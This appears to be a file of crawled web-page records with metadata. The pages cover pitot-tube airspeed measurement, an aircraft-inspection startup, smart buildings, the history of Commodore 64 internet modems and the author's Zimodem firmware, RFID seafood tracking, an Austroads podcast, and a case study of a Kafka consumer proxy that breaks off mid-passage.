Dynamic Pressure Measurements Dynamic pressure measurements are performed using a pitot-static tube. The pitot-static tube is composed of two concentric tubes. At the front end of the tube the outer tube is sealed and only the inner tube is open. This point, called stagnation port, is a blunt obstacle to airflow and therefore the drag coefficient is unity. The pressure exerted to this port consists of the dynamic pressure of the flow and the static ambient pressure (Figure 2). Figure 3: Pitot-static tube (modified after Brock and Richardson 2001) At a distance from the stagnation port sufficient to eliminate dynamic flow effects the pitot-static tube has a couple of small holes penetrating only the outer tube. These are called static ports and they are usually distributed equally spaced around the tube. The pressure exerted to the static ports is only the ambient atmospheric pressure (Fig. 1). The rear end bears two connections, one transferring the pressure applied to the outer tube (pstatic) and a second for the inner tube (pstag). According to Bernoulli’s Equation the pressures can be described using p = ambient pressure, air density and V = air velocity. After the transformation the equation reads as follows: The variable can be substituted with p/RT, where R is the gas constant for dry air = 287 J kg-1K-1 and T is the air temperature in K, leading to the final equation: Since R is the gas constant for dry air, humidity will have an effect, but less than 1%. Although the pitot-tube has to be oriented directly into the airflow a typical tube will tolerate up to 20° of misalignment (BROCK and RICHARDSON 2001).
systems_science
http://www.teresapetulla.com/glow-stress/
2019-10-23T09:11:10
s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570987829507.97/warc/CC-MAIN-20191023071040-20191023094540-00454.warc.gz
0.89275
346
CC-MAIN-2019-43
webtext-fineweb__CC-MAIN-2019-43__0__68108821
en
GlowStress is a next-gen comprehensive nondestructive surface defect detection solution based on new carbon nanotube technology. Our nondestructive surface testing system works on existing aircrafts including next generation aircrafts, and outperforms current testing methods by providing engineers with information they need to clear an aircraft for flight within 15 minutes. GlowStress is a business plan proposal, developed by a team of University of Pennsylvania students, that addresses the current needs of the aerospace industry for new nondestructive testing methods that provide fast, accurate, and comprehensive surface defect detection. The precision of the system removes the need for qualitative judgment calls by providing information on every point of an aircraft’s surface, giving engineers the confidence that all defects on an aircraft’s surface are accounted for. Inspection is a three-part process: Step 1: Paint It GlowPaint is a clear nanotechnology varnish that is applied to aircrafts, essentially forming a skin of sensors on the entire surface. GlowPaint is integrated into regular aircraft paint cycles. Step 2: Scan It GlowScan scans an aircraft's entire surface using a laser-spectrometer array. Testing can be done within 15 minutes allowing pre-flight and post-flight inspections. Step 3: Read It GlowRead, our proprietary diagnostic software, provides an easy to understand visual readout of defects and possible areas of weakness on an aircraft's surface. GlowStress’ simple application process reduces setup time and our integrated system outperforms current nondestructive surface testing on scope, time, and accuracy. Because at 30,000 feet, every detail counts.
systems_science
https://www.efficiencynation.com/post/high-rise-living-in-the-smart-age-the-compelling-case-for-intelligent-residential-buildings
2023-11-28T15:51:01
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679099892.46/warc/CC-MAIN-20231128151412-20231128181412-00419.warc.gz
0.914809
659
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__93461770
en
High-Rise Living in the Smart Age: The Compelling Case for Intelligent Residential Buildings Smart buildings are no longer just a blueprint for the future; they are today's reality, fundamentally transforming the architecture of urban landscapes worldwide. While the initial focus has been on commercial spaces and industrial complexes, the benefits of smart technologies in residential high-rises have become increasingly clear. These technologically-advanced structures offer a unique blend of financial viability, unprecedented security, and exceptional sustainability, making them the smart choice for developers, owners, and residents alike. Capturing Cost-Efficiency for Developers and Owners From a developer’s perspective, smart high-performance residential buildings offer unparalleled financial incentives. Leveraging actual energy performance data allows for significant capital cost reductions in mechanical plant sizing and related infrastructure. In a sector where every penny counts, the implications of these cost reductions can be revolutionary. Property owners and managers are also beneficiaries. Reduced utility costs, lesser carbon tax liabilities, and streamlined operational expenses all contribute to better Net Operating Income (NOI) and Net Asset Value (NAV). The advent of smart technologies is turning high-performance into high-reward investments. Mechanical Operations: The Heart of Smart Efficiency The optimization of mechanical operations is key to realizing the full benefits of smart buildings. System performance data enables the right-sizing of equipment, informed planning for retrofits, and peak mechanical efficiency. Smart HVAC systems, for example, can autonomously adjust themselves based on various data inputs, thereby reducing energy consumption by up to 30%. The Synergy of Technology and Expertise While technology plays a significant role in gathering, normalizing, and transmitting data for smart buildings, the human element cannot be ignored. Industry professionals with a blend of theoretical knowledge and practical experience are essential for analyzing data and making smart recommendations. Their expertise ensures that the efficiencies brought by smart technologies have a validated, quantified, and measured impact—both operationally and financially. Hitting Sustainability Targets As cities and organizations globally grapple with carbon reduction goals, smart residential buildings have emerged as the unexpected heroes. By optimizing mechanical systems, these buildings can offer up to 40% energy savings and 25-30% reduction in greenhouse gas emissions. It’s a win-win situation for building owners committed to sustainability and residents keen on reducing their carbon footprint. The Resident Experience: Smart Living For residents, the advantages go beyond cost-saving and sustainability. Smart high-rises are wired to improve the quality of life, from AI-driven security features to IoT devices that make homes more comfortable and efficient. Think of facial recognition-enabled access systems, apps that guide residents to available parking spaces, or even smart refrigerators that help manage grocery shopping. Smart high-rise residential buildings are not just the homes of the future; they are the homes of today. Through a potent combination of cutting-edge technologies and industry expertise, these structures provide a multitude of benefits that far outweigh the initial investment costs. As smart technologies continue to evolve and become more integrated into our everyday lives, the question is not if but when the majority of the world’s high-rises will transform into smart buildings. One thing is clear: the future of urban
systems_science
https://ode2commies.blogspot.com/2023/06/
2024-04-19T02:52:35
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817253.5/warc/CC-MAIN-20240419013002-20240419043002-00052.warc.gz
0.959113
6,480
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__198907000
en
Bulletin Board Systems (BBSs) in the 1980s are sometimes compared to a primitive version of the internet, and I think there's something to that. Consider the experiences that a typical BBS caller would have when calling around. A user might start their call, for example, by engaging in instant messaging by chatting with the SysOp, then sliding into the message bases for a bit of 'social media' with the other hundred or so active users. Looking for new software, the user might then hit up the file transfers area, where perhaps a whole megabyte of games and utilities might be available, and finally head to the text file area for ansi/petscii images, computer related news, or encyclopedic articles. But then came the actual internet. Instead of chatting with one person, you could chat with all of them. Your social media encompassed people from all over the globe. The availability of software for your computer was measured not in megabytes, but in all-the-bytes; your images and movies were measured in pixels instead of characters per line, and your access to news and information became up-to-the-minute from professional journalists. It was little wonder that BBSes did not fair well against such competition. Some computing ecosystems handled this well. By "well", I mean that standards for network interface APIs were adopted by their communities and operating systems rather quickly. This allowed any software that wanted to provide solutions involving the internet to do so, without having to worry whether their programs would work on newer or competing internet interfaces. Some obvious examples from the early 90s are PCs with Windows via WINSOCK, Apple computers with MacTCP, Amiga computers with AmiTCP, Atari STiNG, and others. This adoption was vital for progress in networking software to occur. With only a single viable API to write, e.g., a web browser against, competing browsers could be developed, with each trying to out-do the others in features, which moved the product space forward. And whether you are looking at Internet Explorer vs Netscape, or IBrowse vs AWeb, this is exactly what happened. Some platforms, however, did not handle the dawn of the internet particularly well. An example of this is the Commodore 8-bit line, particularly the Commodore 64. With multiple and endlessly changing internet interfaces, each one picked up and tossed aside in favor of a Shiny New Way, the result would be a a relative lack in internet software, even of the limited sort that the hardware could handle, and this led to little or no competition or progress. It is this amusing history - this parade of technologies - that I will be walking you through, before I bring in my own float. In the late 1980s and early 1990s, the initial solution for C64 users to get on the internet was an ISP "shell" account. This was functionally similar to a BBS, in the sense that a common 1980s modem was the only hardware you needed, and you used the same terminal programs to access the shell account as you did to access many other non-Commodore BBSs. During this time, demand for C64 and C128 terminal programs that supported *NIX terminal types would increase, leading to the popularity of programs like Novaterm or Desterm. At this time, the C64 "user port", where serial modems were connected, was viewed as being limited to 2400 baud. This limitation was overcome in two different ways. The first was by using the Creative Micro Designs "SwiftLink" 6551 UART cartridge. This cartridge would consume the computers expansion port to provide a faster dedicated standard RS-232 serial interface, capable of using faster modems available for PCs at up to 38.4 bps. Another way higher speeds were achieved was through Danial Dallmann's UP9600 mod, which was presented in 1997. This was a modification of the standard C= user port serial interface, which used additional pins to take advantage of that computers' automatic bit-shifting feature. As the name suggests, it enabled the C64 to reliably communicate at 9600 baud. The mod itself could be done to the modem or to the computer, and required only jumpering a few extra pins to each other. Of course, this entire variety of dial-up internet died with the loss of popularity and availability of ISP shell accounts. So, we're still in the 1990s, and we've already got 3 hardware interfaces to the internet. This means it's time to talk about PC-based modem emulators and null-modem cables. In 1996, I was only 3 years separated from my own BBS SysOp days, when I found myself working in a computer science lab at my university. We had several rows of 386 PCs running Slackware linux, all connected to the internet, and each with an external IP address. This meant that anyone on the internet could access any of those machines. Oh, those days of innocence! Together with some of my old BBSing friends, we engaged in a project to connect my Commodore 128 to one of these machines using a null modem cable, which is simply a serial cable that allows two computers to talk to each other. One end of the cable connected to the PC serial port, while the other end connected to the C128 user port, after going through some voltage converting chips. The C128 would be running my BBS software and watching for the "Carrier Detect" signal on the serial port to go active. Meanwhile, the PC would run a linux terminal program called 'minicom' when a user logged in, which would automatically wake up the C128 BBS program and announce itself to the user. In effect, by remotely connecting to the PC via telnet, and logging in, you would be using a BBS, running on a Commodore 128. My little college project illustrates the next phase in Commodore 8-bit internet access. Around the turn of the millennium, Leif Bloomquist would present "BBS Server", a windows application that would forward tcp/ip connection from the internet to one of the PCs serial ports. The purpose was the same as my minicom example: to allow Commodore BBSs to be accessed from the internet instead of old phone lines, but also included outgoing connection abilities with Hayes style AT-command emulation. This was followed by a project from Jim Brain called TCPSER, which also used null modem cables. This was written as a port of BBS Server to linux, and provided the same Hayes/C= 1670 modem emulation that BBS Server does. The last in this category was Strikelink USB by Alwyz, author of the popular CCGMS term program for the C64. In this case, the Strikelink is a cable that connects the Commodore user port serial interface to the USB port of a PC instead of the standard com port. Like the later Strikelink variations, this was never really produced for sale, but only presented as a project for interested users. These sorts of solutions are still used today. Strikelink USB, in fact, only goes back a decade. However, the requirement of having a PC physically close to your Commodore computer has probably limited its popularity overall. For software, the C64/C128 operating system LUNIX, by Daniel Dallman, had both a SLIP and PPoE client, as well as some very basic internet tools, such as telnet and ftp clients, and a web server. Another internet client was The Wave, for the Wheels operating system, which included a terminal program and web browser. The ethernet cradles may still be in use, but dial-up internet is not exactly common any more. Also, while LUNIX is still remembered by some, The Wave required both Wheels OS and a Super CPU, which leaves it with a limited audience. The mid-late 2000s saw the first ethernet bus cartridge for the C64/C128, called the RR-Net, which is short for "Retro-Replay-Net". It was produced by Individual Computers as an 'add-on' for their "Retro Replay" freeze cartridge. The cartridge contains a Cirrus logic CS8900a ethernet chip, which is set up in 8-bit mode. Registers are then exposed on the C64 expansion port address page to allow packet bytes to be transferred back and forth. The RR-Net was eventually turned into a proper stand-alone cartridge, completely compatible with the original RR-Net add-on. These can be found under the names RR-Net MK3 from Individual Computers, TFE from Adam Dunkels, and the 64NIC+ from go4retro.com. A cartridge solution likes this has the benefit of speed, but the downsides of consuming the cartridge port, and requiring that the C64 run a full tcp/ip stack, with its own buffers. Perhaps half a dozen software titles support the RR-Net, including terminals, a browser, and PC transfer tools, the most impressive being Contiki from Adam Dunkels. Contiki is a GUI operating system with a tcp/ip stack called uIP. The entire OS is essentially designed around networking, and its small selection of internet clients and tools. More recently, the 1541Ultimate-II cartridge was also released with its own ethernet port and interface. The author has provided a couple of tools, including a terminal, which supports this port. The 1541UII is reportedly also adding SwiftLink and modem emulation, to allow the use of other terminal programs. Presumably it is the same interface integrated into the Ultimate64 computer, which is an FPGA reproduction of the computer with built in 1541Ultimate-II features. As microcontrollers became cheaper and more full featured, we started to see them used to give us even more internet options. The COMET 64 was released in 2008, along with the launch of its companion web site "commodoreserver.com". While COMET appears to be a user port modem with wired ethernet, it's actually better described as a storage and data exchange device. Much like Q-Link, CommodoreServer features chat and online gaming options. When a special driver is loaded on the C64 computer, the modem also provides an internet disk drive on device 2, with all files stored on the commodoreserver.com web site. In 2015 we saw the first emergence of the "wifi" modem with the release of the Commodore WiFi Modem by Leif Bloomquist, of BBS Server fame. His user port modem was a complete "BBS Server" package in one box: it could allow incoming connections in order to run a Commodore BBS, as well as allowing outgoing connections to the emerging (re-emerging?) "Telnet BBS" phenomenon. Great care was given to the user interface of this device, with easy menu driven configuration and use. This was the device that inspired my own interest in wifi modems. The next year, the C64Net-WiFi modem would appear, followed soon after by the Strikelink wifi modem project, and later by several other similar devices, which you can still pick up on eBay for $25-50. Like Leif's modem, these would be user port devices, typically with UP9600 support. They all have varying features, but in common they support some variation on the Hayes AT-command set, giving them a level of compatibility with standard C64/C128 terminal programs. Related to the modem emulator, is the LINK-232 WiFi. This wireless ethernet device is connected to an integrated Link-232 cartridge, which in turn ia a clone of the CMD Turbo-232 cart, the successor to the SwiftLink cartridge mentioned above. Like the other wireless modems, it is compatible with a few exceptional term programs, and supports the AT command set. Aside from terminal programs, it also enjoys support from several Zimodem-compatible apps, and upcoming support from Greg Nacu's 64OS. Even more recently the WiC 64 device was also made available for the C64. It features a user port interface like other wifi modems, but uses a parallel instead of serial interface. Although this creates yet another software ecosystem, the advantage would be the speed boost over serial. The last internet platform we'll look at are also the newest: IEC serial port internet devices. The IEC bus is the C64s primary disk drive and printer port, and is supported by the C64 KERNAL as such. These IEC modems have other internet socket communication features, but their primary appeal is clearly for network-based storage. The first of these devices to appear was the COMET+ and COMET Flyer, the successors to the COMET 64 modem discussed previously. Along with it came another web site, commodoreonline.com, providing similar remote disk/file storage as commodoreserver.com did. A later addition to network storage is the PETDisk Max, from bitfixer, which has a IEEE-488 interface for PETs, but includes wifi capabilities for fetching data from disk images over the network. The newest entry in this category is the Meatloaf and Fujinet. While not yet available, Meatloaf is reported to offer similar features to the Flyer, except that it uses more standard web protocols (WebDAV) for dealing with remote disk images and files. It seems is will also optionally include a user-port option for standard modem compatibility. The relationship between Meatloaf and Fujinet is unclear to me, but it's possible the Fujinet for the C64 will be based on Meatloaf. And that brings us up to the present. My own story in all this begins in 1984, when I picked up a VICMODEM for my Commodore 64, and immediately became an avid BBS user. By 1985, I was running my own BBS system, initially on 64Messenger, and then switching to CMBBS. I always found one reason or another to be dissatisfied with these programs though, so in 1986 I wrote and ran my own program, called Zelch 64. In 1990, I switched to the newly written Zelch 128, and ran that until 1993. In 1996, as mentioned above, I revived the Zelch 128 BBS as a telnet-board. After 1997 though, I was a typical C= 8-bit user enjoying all the various internet options mentioned previously, until 2016. The creation of the C64Net WiFi in 2016, by Carlos Santiago of ElectronicsIsFun.com, was my first opportunity to have an impact on internet appliances for the Commodore 8-bits. Carlos himself really wanted a way to access all the disk images he'd downloaded from the internet directly from his C64, and I suspect what he really had in mind was something closer to the Flyer or Meatloaf. However, he also wanted a proper internet modem, and so that's the direction he chose. At the time, I was a user of Leif Bloomquist's wifi modem, and was very excited about the chance to influence the features it would have. The C64Net WiFi would be based on the Espressif ESP-8266, specifically using the incredibly cheap ESP-01 package. This microcontroller came with 1mb of flash memory, and 80kb of user ram, half of which is available to application programmers. The cartridge was designed to be powered entirely by the host computer using its stock power supply. This presented some serious constraints on the C64 user port, which was solved by using both the 5V and 9VAC rails to power the device. A lot of the circuitry on the right side is for converting the 9VAC to 5VDC. The interface is obviously the user port, and the pin configuration is designed to comply with the standards for Commodore user port modems, including pins for both Carrier Detect, and hardware flow control. It also included the pin configuration to support UP9600, which could be disabled via jumpers for C128 users. The speed of the C64 user port serial interface is worth discussing at this point. The most popular Commodore 8-bits: the VIC-20, C64, and C128, did not have a serial UART built into the computer. Serial communication was achieved on the computers' 8-bit parallel "user port" interface by bit-banging routines built into the operating system, called the KERNAL. Commodore initially advertised that the C64 user port could achieve a speed of 300bps, however, it was quickly discovered that, by working around a bug in the KERNAL's bit timing table, 1200bps could easily be supported. The C128 could handle 2400bps, especially in its 2mhz operating mode. By ignoring the KERNAL and using more tightly written bit-banging algorithms in assembly language (Ilker Ficicilar), speeds of 4800-7200bps were achievable. By altering the hardware, UP9600 bumped this up to 9600bps (Dallmann). More recently, 57600bps was achieved by both disabling the VIC-II video chip and timing the bit transfer by counting the cpu cycles instead of using timer interrupts from the computer I/O chips (Jorge Castillo). So, my Zimodem project began in 2016 to provide firmware for the C64Net WiFi and its ESP-8266. From the very beginning, I had three specific goals for the project, which have been achieved to varying degrees. The first goal was that the firmware appear to the user as a Hayes/C= 1670 style modem, and have all the features expected from such a command set. The second was that the modem be a useful appliance to computers that are limited to running terminal programs. The last was that the modem be a useful internet platform, allowing it to be easily used by the host computer for writing custom network applications and games. The firmware for the C64Net uses inverted signals: high for active, low for inactive. This always struck me as intuitive, though the more I've learned about electronics, the more I realize that it's not common, including in RS232. The AT command set includes all the standard commands and every extended command that made any sense for a WiFi modem, and many that didn't. This includes things like response codes, verbosity, duplex, and setting internal registers for auto-answer and number of rings. That last one may not make much sense, but I tried not to assume what all BBS software might expect or be looking for. Commands were also added to list available wireless access points and to connect to one with credentials. Although I was a slave to the Espressif libraries for the types of wireless security supported, I've yet to run into any troubles in that department. ATD, which is the command for making an outgoing call and connecting to a remote phone number, was extended to allow internet hosts and ip addresses. On connection, the modem exits command mode and enters stream mode, where bytes can be sent to and received from the remote system. Support for both hardware and software flow control was added as well, using the ATF and AT&K commands. Additional AT commands were invented to overcome the limits of old terminal programs, and expand the supported platforms. For example, the AT&P command was added to support decoding ASCII/ANSI to PETSCII, including color translation. Both ATR and ATS3 allow the carriage return character to be tweaked. "Telnet" code handling was added mostly to make a remote telnet server happy by responding properly to requests and demands. One issue I ran into here was remote telnet servers that, when receiving a telnet escape code, would immediately read the next character. When dealing with network packets, however, there is never a guarantee that all of the bytes of a telnet command would arrive in the same packet. One of the many accommodations I had to make over the years was to try and guarantee that an entire command would always be contained in the same packet. Baud rate, as well as the ability to change other RS232 settings, such as data bits, stop bits, and parity bits, can be changed with the ATB command. Although 8N1 is practically universal, it wasn't always so, and some older terminals will desire other settings. An important feature for supporting existing terminals and applications was the addition of a persistent phonebook. With the ATP command, fake "phone numbers" can be assigned to particular internet hosts and ports, with desired terminal settings. The phone numbers are automatically persisted to flash memory. Later, whenever the ATD command is used with an integer, the phone book is checked and the matching host connected to. This makes it easy to use the Q-Link revival server called "Q-Link Reloaded". For those unaware, Quantum Link was a C64 online service that was a predecessor to AOL. In addition to the phonebook, 38 different terminal and register settings can be persisted in the onboard flash, meaning that the modem always comes on exactly as you prefer it. This was especially important for machines that prefer odd baud rates or strange data bit and parity settings. The behavior of various pins of the microcontroller can also read or changed using special AT commands. This was important for dealing with UARTs that required, for example, the DCD pin to always be active. The firmware supports over-the-air updates, so there's never a need to deal with special programming cables or software to get the latest version. Updates can be checked for and downloaded on demand using the AT&U command. Specific or custom versions can also be reverted to, should one be feeling nostalgic. I often use this for testing versions with one-off features. The microcontroller does its best to maintain a real-time clock, which can be read using the AT&T command. It will initialize this clock via the Network Time Protocol (NTP) on bootup, and the firmware will allow the TimeZone to be set. A help file for all the AT commands can be accessed with the AT&H command, which will persist the current versions help file after first access for off-line viewing. The wifi modem can be configured with multiple incoming socket listeners on different ports. Like the phonebook, these settings can be persisted with their own terminal settings so that they are immediately available after reboots. Like the "auto-answer" mode on old modems, incoming connections can be configured to send zero or more RING messages and then go automatically into stream mode. This allows Commodore BBS programs that support Hayes or 1670 modems to work out of the box. A custom "busy message" can also be configured, so that an incoming connection request, when another connection is already using the serial port, will know they need to try back later. Another feature in supporting the firmware as a networking platform is the ability to make and manage multiple outgoing connections. The ATC command allows a new remote client to be created, without immediately going into stream mode. Instead, the modem stays in command mode, where special AT commands allow the connections to be managed and communicated with. Whenever data is received from any of the open connections, the data is presented in the form of packets of data, which can be up to 255 bytes. These packets are preceded by a header block, which can contain information such as the connection id that the data came from, the size of the packet, an 8-bit crc of the packet, and the packet sequence number for that connection. If a sequence or crc number for a packet is incorrect, the ATL command can order the modem to re-transmit a previous packet. The ATT command can be used to transmit either a string message, or a block of binary data, to a specified open connection. It can also be configured to return the CRC8 of the data block it received via serial, for error checking. Because internet data is likely to be received far faster than a 1mhz computer can process it, there are several new flow control methods that can be turned on to manage incoming data. These are typically variations on standard software (XON/XOFF) flow control that operate at the packet instead of the character level. These are selected using the ATF command. All of this ended up allowing me to fulfill my dream of being able to write internet application in simple BASIC. Well, *mostly* BASIC. The problem is that BASIC V2 found in the VIC-20 and C64 does not have good string parsing functions, which makes separating the numeric data out of each packet header especially painful. The INPUT# command in BASIC also has some rather annoying parsing rules of its own. Luckily, during my BBS days, I learned how to create BASIC strings from machine language. I therefore wrote some packet machine language routines, which I call "PML", that I can call from BASIC to quickly parse the information from incoming packets, leaving the data in a BASIC string variable. With that, then, I cobbled together some super simple internet applications, such as IRC (Internet Relay Chat) for instant-messaging, an FTP (file transfer protocol) application for uploading and downloading files from FTP sites, a wget application for downloading web pages or binary files from web servers, and a d64wget for downloading .D64/D71/etc disk images directly from a web server to a blank floppy. I also wrote a telnetd server that allows an incoming internet user to remotely "take control" of the C64 BASIC prompt and use the computer as if they were sitting in front of it, so long as they limit their activity to text input and output. I did also write some super simple telnet and petscii terminal programs, just as examples. There are far better terminal programs out there. GEOS, also for the C64 and C128, supports proper printer drivers, so it was a relatively simple matter to produce one that supports the network printing features of the modem. GEOS has a graphical WYSIWYG paradigm for printing; all printouts are actually pictures of what was on the screen. Luckily, the IPP protocol specification lists native support for an image format called RAS, which CUPs also supports. The GEOS printer driver, therefore, has only to translate the screen image data into a RAS formatted image before sending it to the modem for printing. This project was called ras4c64net, and can be found at github. The Amiga also supports printer drivers, but the documentation on how to write them is much less straight forward. I'd love to talk to anyone who's actually written one, as what I found on Aminet and in my books did not click with me. Instead, I relied on the fact that Amiga supports both serial-based printers, and that later versions of AmigaOS come with a PostScript printer driver. I therefore added a feature in the firmware's command mode that would automatically detect when a PostScript file was being dumped into the modem, and immediately go into printing mode. The Gurumodem was also designed with an SD card interface, and therefore needed some way to access it via the modem. This was done by adding the AT+SHELL command, which provides a command line prompt into which you can enter well-known file and directories commands such as dir, copy, move, makedir, cd, etc. So that users of many platforms would feel comfortable, it also supports aliases of all these commands, such as "$", "ls", or "list" for directory, and similar aliases for other commands. The shell also includes a simple ftp client for fetching files from the internet to the fat-formatted sd card. Getting files from the SD card to the host computer is done through the built in shell support for uploading and downloading via the X-Modem protocol, Z-Modem protocol, or KERMIT. The later protocol was added primarily to support the Commodore 900s only stock terminal software. Shell commands can also be entered directly from command mode by adding a colon after AT+SHELL followed by the command. For example AT+SHELL:list would list the current SD card directory to the modem, while remaining in command mode. The Commodore SuperPET natively supports a special serial-port file management protocol called "HOSTCM", which was used to send data to and from other central computers. This 'mode' is turned on with the AT+HOSTCM command. So, that's where things stand with the firmware as of June, 2023. Several new features are actively in the works, or coming very soon. One is SLIP/PPoE support, which has been on the TODO list almost from the very beginning. The ability to leverage LUNIX and support The Wave browser would be an amazing boon. Integrating with lwip in a way that doesn't trash otherwise normal operation has been tricky, but it's coming. I also have been eager to add Pulse-dialing support to the modem, along with pin-level emulation of the Commodore 1650/1660. This would be an amazing addition because of all the pre-1986 software that would instantly become compatible with it, including terminal programs, BBS software, and the game Modem Wars. Lastly, an integrated GOPHER client has been requested, for the extremely limited platform crowd. GOPHER is a fun idea though, as I recall thinking at one point that it was far superior to HTTP and HTML. Apparently, there are still people running GOPHER servers out there, so the usefulness would be immediate. The creator of the WiFi Retromodem at tempestfpga.com has also recently created an ESP-32 based modem that fits in an old Hayes modem case. To the Zimodem firmware, he added the ability to play old modem sounds out of a speaker, which is absolutely delightful. Perhaps that will be integrated to the main branch soon. Otherwise, I'm always open to suggestions and bug reports. Please post them on my Zimodem repository "Issues" section at github. Well, that wraps up this very very long look back at internet solutions for the Commodore 8-bits, and how my own projects have weaved in and out of that tapestry. I hope you enjoyed the parade, and perhaps learned about some technology you'd never heard of. I also sincerely hope you recognize the potential the 8-bits have as networking clients, if we can only settle on an API. Here are some parting resources: - Project page: github.com/bozimmerman/zimodem - C64/128 BBS Software page: bbs.zimmers.net - The "Zelch BBS": coffeemud.net:6502 - MMORPG for old machines: coffeemud.net:23
systems_science
https://sednatech.io/dockside-traceability/
2022-10-02T21:36:40
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00397.warc.gz
0.910941
323
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__183097789
en
Tracking movement of inventory from moment of purchase Digitizing paperwork to streamline purchasing processes. RFID tags are placed on crates of lobsters when purchased at dockside location – attaching specific information and allowing the product to be scanned and traced as it moves throughout the supply chain. Mobile printers are linked to our handhelds to allow harvester receipts to be printed instantly, eliminating the need to manually write slips. Location and volumes of product are tracked in real-time and a complete digital history of the movement of products is logged. The head office has access to this information in real-time, which improves production planning. Hardware : A network of handheld devices, mobile printers and RFID tags. Software : Sedna’s software powers all mobile devices as well as interacts directly with our cloud database in real time. Allowing the back office to view purchase orders and sales orders at the time of transaction. In addition to this, real-time information on your raw material acquisition will increase production management and increase your quality as known purchases can be transported to holding environments more efficiently. - Eliminates manual data entry - Easy to use interface - Crate level inventory tracking - Improves transparency and accountability Accountability of workers Automated Digital History & Location Reduce Human Error “We track every crate of lobsters with Sedna’s RFID inventory system. “ “Our operation is now digitized from dock to sale”
systems_science
http://podcasts.austroads.com.au/p/about-1518153494/
2022-05-29T11:18:46
s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662644142.66/warc/CC-MAIN-20220529103854-20220529133854-00629.warc.gz
0.924607
262
CC-MAIN-2022-21
webtext-fineweb__CC-MAIN-2022-21__0__233965942
en
This Podcast broadcasts recordings of Austroads' technical and research webinars. Austroads is the peak organisation of Australasian road transport and traffic agencies. Our members are collectively responsible for the management of over 900,000 kilometres of roads valued at more than $200 billion representing the single largest community asset in Australia and New Zealand. Austroads’ purpose is to support our member organisations to deliver an improved Australasian road transport network. One that meets the future needs of the community, industry and economy. A road network that is safer for all users and provides vital and reliable connections to place and people. A network that uses resources wisely and is mindful of its impact on the environment. To succeed in this task, we undertake leading-edge road and transport research which underpins our input to policy development and published guidance on the design, construction and management of the road network and its associated infrastructure. We also administer the National Exchange of Vehicle and Driver Information System (NEVDIS), a unique national system which enables road authorities to interact across state borders and directly supports the transport and automotive industries. For enquiries about Austroads or this Podcast please email [email protected] To participate in our live broadcasts, register via our events page.
systems_science
https://team-triage.github.io/case-study
2024-03-03T09:02:35
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476211.69/warc/CC-MAIN-20240303075134-20240303105134-00024.warc.gz
0.92591
6,622
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__958249
en
Triage - A Kafka Proxy Triage is an open-source consumer proxy for Apache Kafka that solves head-of-line blocking (HoLB) caused by poison pill messages and non-uniform consumer latency. Once deployed, poison pill messages will be identified and delivered to a dead letter store. By enabling additional consumer instances to consume messages, Triage uses parallelism to ensure that an unusually slow message will not block the queue. Our goal was to create a service that could deal with HoLB in a message queue while making it easy for consumer application developers to maintain their existing workflow. This case study will begin by exploring the larger context of microservices and the role of message queues in facilitating event-driven architectures. It will also describe some of the basics regarding Kafka’s functionality and how HoLB can affect consumers, followed by an overview of existing solutions. Finally, we will dive into the architecture of Triage, discuss important technical decisions we made, and outline the key challenges we faced during the process. Problem Domain Setup The World of Microservices Over the last decade, microservices have become a popular architectural choice for building applications. By one estimate from 2020, 63% of enterprises have adopted microservices, and many are satisfied with the tradeoffs . Decoupling services often leads to faster development time since work on different services can be done in parallel. Additionally, many companies benefit from the ability to independently scale individual components of their architecture, and this same decoupling makes it easier to isolate failures in a system. Microservice architectures are flexible enough to allow different technologies and languages to communicate within the same system, creating a polyglot environment. This flexibility enables a multitude of different approaches for achieving reliable intra-system communication. Two common options are the request-response pattern and event-driven architecture (EDA). Although the latter is where our focus lies, it is useful to have some context on the shift toward EDAs. From Request-Response to Event-Driven Architecture A typical request-response pattern is commonly used on the web, and that is no different from what we are referring to here. For example, imagine a number of interconnected microservices. One of them sends a request to another and waits for a response. If any one of the services in this chain experiences lag or failure, slowdowns cascade throughout the entire system. In an EDA, however, the approach is centered around “events”, which can be thought of as any changes in state or notifications about a change. The key advantage is that each service can operate without concern for the state of any other service - they perform their tasks without interacting with other services in the architecture. EDAs are often implemented using message queues. Producers write events to the message queue, and consumers read events off of it. For example, imagine an online store - a producer application might detect that an order has been submitted and write an “order” event to the queue. A consumer application could then see that order, dequeue it, and process it accordingly. What is Kafka? In a traditional message queue, events are read and then removed from the queue. An alternative approach is to use log-based message queues, which persist events to a log. Among log-based message queues, Kafka is the most popular – over 80% of Fortune 100 companies use Kafka as part of their architecture . Kafka is designed for parallelism and scalability and maintains the intended decoupling of an EDA. In Kafka, events are called messages. How Does Kafka Work? Typically, when talking about Kafka, we are referring to a Kafka cluster - a cluster is comprised of several servers, referred to as brokers, working in conjunction. A broker receives messages from producers, persists them, and makes them available to consumers. Topics are named identifiers used to group messages together. Topics, in turn, are broken down into partitions. To provide scalability, each partition of a given topic can be hosted on a different broker. This means that a single topic can be scaled horizontally across multiple brokers to provide performance beyond the ability of a single broker. Each instance of a consumer application can then read from a partition, allowing for parallel processing of messages within a topic. Consumers are organized into consumer groups under a common group ID to enable Kafka’s internal load balancing. It is important to note that while a consumer instance can consume from more than one partition, a partition can only be consumed by a single consumer instance. If the number of instances is higher than the number of available partitions, some instances will remain inactive. Internally, Kafka uses a mechanism called “commits” to track the successful processing of messages. Consumer applications periodically send commits back to the Kafka cluster, indicating the last message they’ve successfully processed. Should a consumer instance go down, Kafka will have a checkpoint to resume message delivery from. Head-of-Line Blocking in Kafka A significant problem that can be experienced when using message queues is head-of-line blocking (HoLB). HoLB occurs when a message at the head of the queue blocks the messages behind it. Since Kafka’s partitions are essentially queues, messages may block the line for two common reasons – poison pills and unusually slow messages. Poison pills are messages that a consumer application receives but cannot process. Messages can become poison pills for a host of reasons, such as corrupted or malformed data. HoLB Due to Poison Pills To better understand how poison pills cause HoLB, imagine an online vendor tracking orders on a website. Each order is produced to an orders topic. A consumer application is subscribed to this topic and needs to process each message so that a confirmation email for orders can be sent 